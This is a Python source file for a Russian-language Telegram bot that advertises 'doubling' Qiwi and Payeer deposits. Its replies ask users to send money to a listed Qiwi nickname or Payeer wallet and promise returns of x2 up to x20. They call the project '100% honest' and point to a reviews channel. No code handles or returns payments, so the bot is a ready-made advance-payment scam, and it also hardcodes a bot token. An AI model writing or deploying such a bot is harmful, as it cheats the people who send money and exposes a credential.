import telebot


from telebot import types
 
token = '1513556604:AAEvZJ-Q-oH0RgzMJzv76Q4JwFSoZv-O_qE'
bot = telebot.TeleBot(token)
 
@bot.message_handler(commands=['start'])
def welcome(message):
 
    # keyboard
    markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
    item1 = types.KeyboardButton("⚡️Удвоить Qiwi")
    item2 = types.KeyboardButton("⚡️Удвоить payeer")
    item3 = types.KeyboardButton("✅Отзывы (Гарантия)")
 
    markup.add(item1, item2, item3)
 
    bot.send_message(message.chat.id, "🚀Лучший бот по заработку🚀 \n💎Удвоитель Qiwi💎 \n⚡️Удвоитель Payeer⚡️ \n⚡️Большое количество отзывов⚡️ \nУ нас один бот, остерегайтесь мошенников🆘", reply_markup=markup)

@bot.message_handler(content_types=['text'])
def lala(message):
	if message.text == '⚡️Удвоить Qiwi':
	    bot.send_message(message.chat.id, '❗️Как это работает ⁉️\n💨Вы вносите вклад на кошелек Qiwi.\nQiwi никнейм (NEYED247) - Qiwi✅\n \n \nБот автоматически обработает платеж и перешлёт вам сумму в x2 сразу на баланс\n \n❗️ЛИМИТ НА УДВОЕНИЕ - 1 РАЗ❗️\n \n💎АКЦИЯ\n \n❕Если Переводите от 125₽ получаете не X2, а X4\n❕Если Переводите от 200₽ получаете X10\n❕Если Переводите от 300₽ получаете X20')
	if message.text == '⚡️Удвоить payeer':
		bot.send_message(message.chat.id, '❗️Как это работает ⁉️\n💨Вы вносите вклад на кошелек Payeer.\nОт 30 рублей до 1500 рублей!\n \nP1040460112 - 🅿️Payeer\n \nКомментарий - X183936\n \nБот автоматически обработает платеж и перешлёт вам сумму в x2 сразу на баланс\n \n❗️ЛИМИТ НА УДВОЕНИЕ - 1 РАЗ❗️\n \n💎АКЦИЯ\n \n❕Если Переводите от 125₽ получаете не X2, а X4\n❕Если Переводите от 200₽ получаете X10\n❕Если Переводите от 300₽ получаете X20')
	if message.text == '✅Отзывы (Гарантия)':
		bot.send_message(message.chat.id, 'Наш проект на 100% честный!\n \n И поэтому у нас даже есть свой канал с отзывами 😉\n🆘Остерегайтесь мошенников! У нас только один бот, и один канал с отзывами!\n \n⭐️Отзывы можно посмотреть тут - https://t.me/joinchat/WFvmSjy3eTfVDxd5 ⭐️')
		
bot.polling(none_stop = True)
